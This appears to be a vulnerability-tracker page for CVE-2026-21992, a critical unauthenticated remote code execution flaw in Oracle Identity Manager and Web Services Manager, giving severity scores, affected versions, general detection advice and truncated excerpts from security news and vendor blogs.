CVE-2026-21992
published 2026-03-20CVE-2026-21992: Vulnerability in the Oracle Identity Manager product of Oracle Fusion Middleware (component: REST WebServices) and Oracle Web Services Manager product of…
PriorityP266critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
1.01%
58.7th percentile
Vulnerability in the Oracle Identity Manager product of Oracle Fusion Middleware (component: REST WebServices) and Oracle Web Services Manager product of Oracle Fusion Middleware (component: Web Services Security). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Identity Manager and Oracle Web Services Manager. Successful attacks of this vulnerability can result in takeover of Oracle Identity Manager and Oracle Web Services Manager. Note: Oracle Web Services Manager is installed with an Oracle Fusion Middleware Infrastructure. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | identity_manager | — | — |
| oracle | identity_manager | — | — |
| oracle | web_services_manager | — | — |
| oracle | web_services_manager | — | — |
| oracle_corporation | oracle_identity_manager | — | — |
| oracle_corporation | oracle_identity_manager | — | — |
| oracle_corporation | oracle_web_services_manager | — | — |
| oracle_corporation | oracle_web_services_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →CVE-2026-21992 is exploitable unauthenticated over HTTP (no authentication, no user interaction required) targeting Oracle Identity Manager REST WebServices and Oracle Web Services Manager Web Services Security components — monitor for anomalous unauthenticated HTTP requests to these endpoints ↗
- →Oracle released an out-of-band (emergency) patch for CVE-2026-21992, indicating high urgency; treat unpatched Oracle Identity Manager and Oracle Web Services Manager instances (versions 12.2.1.4.0 and 14.1.2.1.0) as actively at risk ↗
- →Possible in-the-wild exploitation reported; treat any unexpected process spawning or outbound connections from Oracle Identity Manager or Web Services Manager processes as high-priority indicators ↗
- →A related pre-authenticated RCE flaw in the same Oracle Identity Manager component (CVE-2025-61757) was confirmed exploited in the wild and added to CISA KEV in November 2025 — treat CVE-2026-21992 exploitation TTPs as likely similar ↗
- →Oracle declined to confirm exploitation status to press, suggesting possible active exploitation being investigated; prioritize network-level detection of unauthenticated HTTP RCE attempts against Oracle Identity Manager REST and Web Services Manager endpoints ↗
- ·Patches released through Oracle's Security Alert out-of-band program are only available for versions under Premier or Extended Support; older unsupported versions remain vulnerable and will not receive fixes ↗
- ·Oracle Web Services Manager is installed as part of Oracle Fusion Middleware Infrastructure — patching scope must include the full Fusion Middleware stack, not just standalone Identity Manager deployments ↗
- ·Affected versions are specifically 12.2.1.4.0 and 14.1.2.1.0 for both Oracle Identity Manager and Oracle Web Services Manager; other versions are not listed as affected ↗
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No public exploits indexed.
Bleepingcomputer
CISA flags two-year-old Oracle flaw as actively exploited in attacks
blogs_bleepingcomputer·2026-06-02·CVSS 7.5
CVE-2024-21182 [HIGH] CISA flags two-year-old Oracle flaw as actively exploited in attacks
## CISA flags two-year-old Oracle flaw as actively exploited in attacks
## Sergiu Gatlan
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered government agencies to secure their systems against a high-severity Oracle WebLogic Server vulnerability that was patched two years ago and is now actively exploited in attacks.
Oracle WebLogic Server is an enterprise-grade Java app server used as middleware for large, multi-tier distributed applications.
Tracked as CVE-2024-21182 , this security flaw can be exploited remotely by threat actors with no privileges in low-complexity attacks targeting systems running Oracle WebLogic Server versions 12.2.1.4.0 and 14.1.1.0.0.
"Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to
Talos
A puppet made me cry and all I got was this t-shirt
blogs_talos·2026-03-26
A puppet made me cry and all I got was this t-shirt
## A puppet made me cry and all I got was this t-shirt
Welcome to this week’s edition of the Threat Source newsletter.
Anyone who spoke with me in the last several weeks has had to deal with me loudly waiting in anticipation for the long-awaited “Project Hail Mary” movie adaptation. I read (and cried over) the book by Andy Weir, who’s also the author of “The Martian,” about a year ago and, shortly after, found out it was being made into a movie.
(I know what you’re thinking: Two movie-themed editions in two weeks? It’s every cinephile’s dream!)
Anyway, the story centers around a biologist and science teacher named Ryland Grace (Ryan Gosling), who wakes up from a coma on a spaceship lightyears away from Earth, his two crewmembers long dead. Our planet’s sun is slowly dimming, its energy
Hackernews
⚡ Weekly Recap: CI/CD Backdoor, FBI Buys Location Data, WhatsApp Ditches Numbers & More
blogs_hackernews·2026-03-23
⚡ Weekly Recap: CI/CD Backdoor, FBI Buys Location Data, WhatsApp Ditches Numbers & More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: CI/CD Backdoor, FBI Buys Location Data, WhatsApp Ditches Numbers & More
Another week, another reminder that the internet is still a mess. Systems people thought were secure are being broken in simple ways, showing many still ignore basic advisories.
This edition covers a mix of issues: supply chain attacks hitting CI/CD setups, long-abused IoT devices being shut down, and exploits moving quickly from disclosure to real attacks. There are also new malware tricks showing attackers are becoming more patient and creative.
It’s a mix of old problems that never go away and new methods that are harder to detect. Th
Hackernews
Oracle Patches Critical CVE-2026-21992 Enabling Unauthenticated RCE in Identity Manager
blogs_hackernews·2026-03-21·CVSS 9.8
CVE-2026-21992 [CRITICAL] Oracle Patches Critical CVE-2026-21992 Enabling Unauthenticated RCE in Identity Manager
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Oracle Patches Critical CVE-2026-21992 Enabling Unauthenticated RCE in Identity Manager
Oracle has released security updates to address a critical security flaw impacting Identity Manager and Web Services Manager that could be exploited to achieve remote code execution.
The vulnerability, tracked as CVE-2026-21992 , carries a CVSS score of 9.8 out of a maximum of 10.0.
"This vulnerability is remotely exploitable without authentication," Oracle said in an advisory. "If successfully exploited, this vulnerability may result in remote code execution."
CVE-2026-21992 affects the following versions -
Oracle Identity Manager ver
Tenable
CVE-2026-21992: Critical Out-of-Band Oracle Identity Manager and Oracle Web Services Manager Remote Code Execution Vulnerability
blogs_tenable·2026-03-20·CVSS 9.8
[CRITICAL] CVE-2026-21992: Critical Out-of-Band Oracle Identity Manager and Oracle Web Services Manager Remote Code Execution Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
Oracle pushes emergency fix for critical Identity Manager RCE flaw
blogs_bleepingcomputer·2026-03-20·CVSS 9.8
CVE-2026-21992 [CRITICAL] Oracle pushes emergency fix for critical Identity Manager RCE flaw
## Oracle pushes emergency fix for critical Identity Manager RCE flaw
## Lawrence Abrams
Update: Added that Oracle declined to comment on whether the vulnerability has been exploited.
Oracle has released an out-of-band security update to fix a critical unauthenticated remote code execution vulnerability in Identity Manager and Web Services Manager tracked as CVE-2026-21992.
Oracle Identity Manager is used for managing identities and access across an enterprise, while Oracle Web Services Manager provides security and management controls for web services.
In an advisory released yesterday, Oracle is "strongly" recommending that customers apply the patches as soon as possible.
"This Security Alert addresses vulnerability CVE-2026-21992 in Oracle Identity Manager and Oracle Web Services
Wiz
CVE-2026-21992 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-21992 [CRITICAL] CVE-2026-21992 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21992 :
Oracle Identity Manager vulnerability analysis and mitigation
Vulnerability in the Oracle Identity Manager product of Oracle Fusion Middleware (component: REST WebServices) and Oracle Web Services Manager product of Oracle Fusion Middleware (component: Web Services Security). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Identity Manager and Oracle Web Services Manager. Successful attacks of this vulnerability can result in takeover of Oracle Identity Manager and Oracle Web Services Manager. Note: Oracle Web Services Manager is installed with an Oracle Fusion Middleware Infrastructure. CVSS 3.1 Base Score 9.8 (Confidentiality, Integr
Tenable
Blog
blogs_tenable
Blog
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
2026-03-20
Published